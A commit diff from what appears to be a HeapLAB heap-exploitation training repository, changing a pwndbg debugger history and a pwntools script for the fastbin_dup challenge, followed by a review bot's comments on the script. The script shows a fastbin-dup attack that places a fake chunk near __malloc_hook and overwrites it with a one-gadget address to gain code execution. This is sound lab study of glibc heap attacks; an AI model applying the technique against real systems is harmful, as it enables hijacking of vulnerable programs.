modified: HeapLAB/challenge-fastbin_dup/.gdb_history

modified:   HeapLAB/challenge-fastbin_dup/bruh.py
Brett Weiland 2021-01-04 20:25:35 -06:00
parent 4c06c05f4e
commit 93f5247d9c
2 changed files with 71 additions and 66 deletions


@ -1,68 +1,3 @@
c
x 0x7f4854db6b40
c
x 0x7f4854db6b40
x main_arena
x &main_arena
x &__malloc_hook
x main_arena.top
db main_arena.top
c
c
c
q
print __malloc_hook
print __malloc_hook
fastbins
c
fastbins
c
vis_heap_chunks
c
fastbins
r
c
fastbins
print main_arena
vis_heap
c
fastbins
fastbins
c
fastbins
r
c
quit
db main_arena
db &main_arena.fastbinsY
q
r
c
c
fastbins
print &main_arena
print main_arena
c
print main_arena
db main_arena
db &main_arena
db &main_arena/100
db &main_arena 100
db &main_arena 1000
q
db main_arena.bins
db &main_arena.fastbinsY
run
c
c
q
r
c
fastbins
c
fastbins
c
fastbins
r
c
c
@ -254,3 +189,68 @@ db 0x7f265fd4cb2d-1
db
c
db &__malloc_hook-(16) (16*8)
exit
quit
x rsp
print $rsp+50
print $rsp
print $*rsp
print $rsp
print (void*)$rsp
print (void*)$rsp+50
print (void*)*$rsp+50
print (void*)&$rsp+50
x 0x7ffc1644e71a
print (void*)&$rsp+50
print (void*)$rsp+50
print (void*)$rsp+0x50
x 0x7ffc1644e738
quit
q
print main_arena
find_fake_fast &__malloc_hook
q
quit
fastbins
find_fake_fast &__malloc_hook
print (void*)&__malloc_hook
q
x &__malloc_hook
db &__malloc_hook-(16) (16*8)
db &__malloc_hook-(16) (17*8)
db &__malloc_hook-(16) (18*8)
db &__malloc_hook-(16) (19*8)
db &__malloc_hook-(16) (20*8)
quit
db &__malloc_hook-(16) (20*8)
db &__malloc_hook-(16) (16*8)
db &__malloc_hook-(16) (20*8)
quit
db &__malloc_hook-(16) (20*8)
find_fake_fast &__malloc_hook
db 0x7fd4a6cf7b2d-(16) (20*8)
q
print main_arena
vis_heap_chunks
db 0x7f37a78ddb7d-(16) (20*8)
db 0x7f37a78ddb7d-(32) (20*8)
quit
db 0x7f37a78ddb7d-(32) (20*8)
db main_arena.top-(32) (20*8)
search 0x7f323f6f0fa1
search 0x7f323f6f0fa1
search --help
search --qword 0x7f323f6f0fa1
search -p 0x7f323f6f0fa1
search -p 0x0fa1
search -p 0xa10f
search -hexp 0x7f323f6f0fa1
search --hex 0x7f323f6f0fa1
search --hex 7f323f6f0fa1
search --hex -8 7f323f6f0fa1
search -8 --hex 7f323f6f0fa1
search -t qword --hex 7f323f6f0fa1
search -t qword -x 7f323f6f0fa1
search -t qword -x 0x7f323f6f0fa1
search -t qword 0x7f323f6f0fa1
quit


@ -74,9 +74,14 @@ malloc(119, 'sdfg')
#8 * 9
payload_loc = libc.sym.__malloc_hook - 35
payload_loc = libc.sym.__malloc_hook - 35 #definetly the right thing
malloc(119, p64(0)*9 + p64(payload_loc))
#we now have things in place and shit
onegadget = libc.address + 0xe1fa1
malloc(72, p64(0)*(35) + p64(onegadget))
print("onegadget: {}".format(hex(onegadget)))
print("top chunk addr: {}".format(hex(payload_loc)))
# =============================================================================
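Review bot: The added `print("top chunk addr: {}".format(hex(payload_loc)))` mislabels its value, because `payload_loc` is `libc.sym.__malloc_hook - 35` and not the arena's top chunk; a label such as `print("payload_loc (__malloc_hook - 35): {}".format(hex(payload_loc)))` would match what is printed. The literals `0xe1fa1` and `35` appear to depend on one particular libc build and are unexplained, so I would name them and record their origin, e.g. `ONE_GADGET_OFFSET = 0xe1fa1  # only valid for the libc shipped with this lab`. The new comment `#definetly the right thing` gives no reason for the offset and should be replaced by one that does. The script is flat and continues outside this hunk, so how `libc.address` is set cannot be checked from here.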